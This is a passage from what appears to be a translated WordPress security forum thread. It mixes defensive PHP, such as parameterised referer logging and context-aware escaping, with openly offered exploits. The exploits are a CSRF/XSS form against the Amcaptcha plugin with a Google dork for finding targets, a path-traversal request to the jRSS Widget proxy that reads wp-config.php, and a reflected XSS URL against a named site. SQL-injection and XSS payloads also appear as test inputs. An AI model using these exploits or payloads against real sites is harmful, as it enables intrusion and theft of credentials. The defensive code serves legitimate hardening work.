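    if ($p === false || empty($p['host']) || !array_key_exists($p['host'], SEARCH_PARAMS)) {
        return null;
    }
    parse_str($p['query'] ?? '', $q);        // decodes exactly once
    $term = $q[SEARCH_PARAMS[$p['host']]] ?? '';
    if (!is_string($term) || $term === '') {
        return null;
    }
    return [$p['host'], mb_substr($term, 0, 200)];
}

function open_stats_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE referer_stats (id INTEGER PRIMARY KEY, url TEXT, host TEXT, search TEXT, hits INTEGER)');
    return $db;
}

// Insert a new row or bump the counter. Every value travels as a bound
// parameter, so quotes, 0x.. literals and '#' comments in the term stay data.
function record_search(PDO $db, string $pageUrl, string $referer): bool
{
    $hit = parse_search_referer($referer);
    if ($hit === null) {
        return false;
    }
    [$host, $term] = $hit;
    $upd = $db->prepare('UPDATE referer_stats SET hits = hits + 1 WHERE url = :u AND search = :s');
    $upd->execute([':u' => $pageUrl, ':s' => $term]);
    if ($upd->rowCount() === 0) {
        $ins = $db->prepare('INSERT INTO referer_stats (url, host, search, hits) VALUES (:u, :h, :s, 1)');
        $ins->execute([':u' => $pageUrl, ':h' => $host, ':s' => $term]);
    }
    return true;
}

$db = open_stats_db();
// Constructed Referer values, including the injection attempt quoted in the post above.
$hostile = 'http://yandex.ru/yandsearch?text=wp%27,1),(0x00,0x2f,0x00,0x00,user(),1)%23&lr=6';
record_search($db, '/2009/07/post', $hostile);
record_search($db, '/2009/07/post', 'http://www.google.com/search?q=wordpress+plugins');
record_search($db, '/2009/07/post', 'http://www.google.com/search?q=wordpress+plugins');
record_search($db, '/2009/07/post', 'http://evil.example/?text=ignored');   // unknown host: skipped

// Three calls produced two rows; the hostile term is stored verbatim as one string.
foreach ($db->query('SELECT host, search, hits FROM referer_stats') as $row) {
    printf("%-15s %-3d %s\n", $row['host'], $row['hits'], $row['search']);
}
```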
WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF
The bug is in this function:
PHP:
function comment_post ($id){
    global $user_ID;
    global $langs;
    $texts = $langs[get_option('ac_lang')];
    if ($user_ID) return $id;
    if ($_POST[$_SESSION['amcaptcha_session']] != '1'){
        wp_delete_comment($id);
        echo "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment'];
        exit;
    }
}
More precisely:
PHP:
if ($_POST[$_SESSION['amcaptcha_session']] != '1'){
    wp_delete_comment($id);
    echo "<strong>".$texts['error']."</strong><br/><br/>".$_POST['comment'];
    exit;
}
If the user did not send this module's session value (that is, did not tick the "I confirm that I am not a spam bot" checkbox), the module prints an error and, in doing so, does not filter $_POST['comment'] at all. The exploit itself looks like this:
Code:
<html>
<head>
<title>WordPress - Amcaptcha plugin ( amcaptcha.php ) <= 1.5 CSRF Exploit</title>
<!-- Vulnerability found by total90, exploit written by Dr.TRO -->
</head>
<body>
<form action="http://[Домен][Путь к WP]wp-comments-post.php" method="post" name="commentform">
<input type="hidden" name="author" value="Dr.TRO" />
<input type="hidden" name="email" value="[email protected]" />
<input type="hidden" name="comment" value="[Уязвимое место]" />
<input type="hidden" name="comment_post_ID" value="[ID существующего поста]" />
<input type="submit" name="submit" value="Request" />
</form>
</body>
</html>
Code analysis and exploit by Dr.TRO
Google dork: "Для того, чтобы иметь возможность комментировать, включите JavaScript в Вашем браузере."
WordPress Plugin [jRSS Widget] File Disclosure Vulnerability
Plugin name: jRSS Widget
Version: 1.0
File Disclosure
Vuln file: /wp-content/plugins/jrss-widget/proxy.php
PHP:
header('Content-type: application/xml');
$handle = fopen($_REQUEST['url'], "r");
if ( $handle ) {
    while ( !feof($handle) ) {
        $buffer = fgets($handle, 4096);
        echo $buffer;
    }
    fclose($handle);
}
Exploit:
Code:
POST http://[host]/[path]/wp-content/plugins/jrss-widget/proxy.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

url=../../../wp-config.php
Wordpress 2.9.2 Passive XSS Search.php
Let me say up front that this vulnerability is not present in all WP themes. Let's look at the Simple Balance theme's search.php:
PHP:
<?php include (TEMPLATEPATH . '/header.php'); ?>
<div id="page">
<?php if (!isset($theme_options["layout_style"]) || $theme_options["layout_style"] == "scs") { include (TEMPLATEPATH . '/lsidebar.php'); } ?>
<div id="content">
<?php include (TEMPLATEPATH . '/topads.php'); ?>
<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>
<?php if (have_posts()) : ?>
<?php while (have_posts()) : the_post(); ?>
<div class="post">
<div class="postTitle"><h2><a href="<?php the_permalink() ?>" rel="bookmark" title="<?php the_title(); ?>"><?php the_title(); ?></a></h2></div>
<div class="postInfo">Опубликовано <?php the_time('d.m.Y'); ?> в рубрике <?php the_category(', ') ?> <?php edit_post_link('изменить', '(', ')'); ?></div>
<div class="postContent">
<?php the_excerpt(); ?>
</div>
<?php if(function_exists('the_tags')) { ?><div class="postExtras"><strong>Метки:</strong> <?php the_tags('', ', ', ''); ?></div><?php } ?>
<div class="postMeta">
<span class="postLink"><a href="<?php the_permalink() ?>" title="<?php the_title(); ?>">Читать пост</a></span>
<?php $comNo = get_comment_type_count('comment'); // Checking if there are any actual comments (trackbacks and pingbacks excluded)
if ($comNo == 1 ) { ?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php } elseif ($comNo > 1) { ?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Один комментарий', 'Комментариев '.$comNo.''); ?></span>
<?php } else { ?>
<span class="postComments"><?php comments_popup_link('Прокомментируете?', 'Прокомментируете?', 'Прокомментируете?'); ?></span>
<?php } ?>
</div>
</div>
<?php endwhile; ?>
<div class="navigation">
<div class="left"><?php previous_posts_link('« В будущее') ?></div>
<div class="right"><?php next_posts_link('В прошлое »') ?></div>
</div>
<?php else: ?>
Ничего не найдено.<br />
Извините, по вашему запросу ничего не найдено. Возможно, вам стоит изменить параметры поиска?
<?php endif; ?>
</div>
<?php if (isset($theme_options["layout_style"]) && $theme_options["layout_style"] == "css") { include (TEMPLATEPATH . '/lsidebar.php'); } ?>
<?php include (TEMPLATEPATH . '/rsidebar.php'); ?>
</div>
<?php include (TEMPLATEPATH . '/footer.php'); ?>
We are only interested in this line:
PHP:
<h4 class="archiveTitle">Результаты поиска <strong>'<?php echo $s?>'</strong></h4>
As we can see, the script outputs the $s parameter without filtering it in any way. Accordingly, if you pass the script JS code inside a <script> tag, it will execute.
Exploitation: [host]/[path]/?s=[xss]
Example: http://seocekret.ru/?s=<script>alert()</script>
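The search.php line above, the Amcaptcha error echo of $_POST['comment'] and the Google Analytics ?s= URLs earlier in the thread are the same bug in three different output contexts, and each context needs its own escaping: HTML text, an HTML attribute, and a string inside a <script> block, where HTML entities are not decoded and the value has to be emitted as a JavaScript literal instead. The following is an added example, not the theme's or either plugin's code, showing all three with the payloads quoted in the thread; in WordPress the corresponding helpers are esc_html(), esc_attr() and wp_json_encode() (or esc_js() for the inline-attribute case).

```php
<?php
// Added example (not the theme's or plugins' code): escape a search term
// correctly for the HTML text, HTML attribute and <script> contexts.
declare(strict_types=1);

// ENT_QUOTES makes one function serve both the text and the attribute
// context: < > & " ' all become entities.
function esc_html_ctx(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Inside <script>, the value must be a JavaScript string literal with < > & ' "
// hex-escaped, so that "</script>" cannot close the element and a quote cannot
// end the literal. Invalid UTF-8 is substituted rather than failing the encode.
function esc_js_string(string $s): string
{
    return json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
        | JSON_UNESCAPED_UNICODE | JSON_INVALID_UTF8_SUBSTITUTE);
}

function render_search_title(string $s): string      // the <h4> from search.php
{
    return '<h4 class="archiveTitle">Search results for <strong>\'' . esc_html_ctx($s) . '\'</strong></h4>';
}

function render_search_box(string $s): string        // the term echoed back into value=""
{
    return '<input type="text" name="s" value="' . esc_html_ctx($s) . '" />';
}

function render_analytics(string $s): string         // the term inside an inline script
{
    return "<script>\n  trackSearch(" . esc_js_string($s) . ");\n</script>";
}

// Constructed inputs: the payloads quoted in the posts above.
$inputs = [
    '<script>alert()</script>',
    '</script><script>alert(0)</script>',
    '");alert(0);document.write("',
    '" onfocus="alert(1)',
];
foreach ($inputs as $s) {
    echo render_search_title($s), "\n";
    echo render_search_box($s), "\n";
    echo render_analytics($s), "\n\n";
}
```

For the second input the script block becomes trackSearch("\u003C/script\u003E\u003Cscript\u003Ealert(0)\u003C/script\u003E"); and for the third trackSearch("\u0022);alert(0);document.write(\u0022");, both of which the browser reads as a single harmless string. Feeding the same values through esc_html_ctx() inside a <script> would not be safe, since &lt; and &quot; are not decoded there.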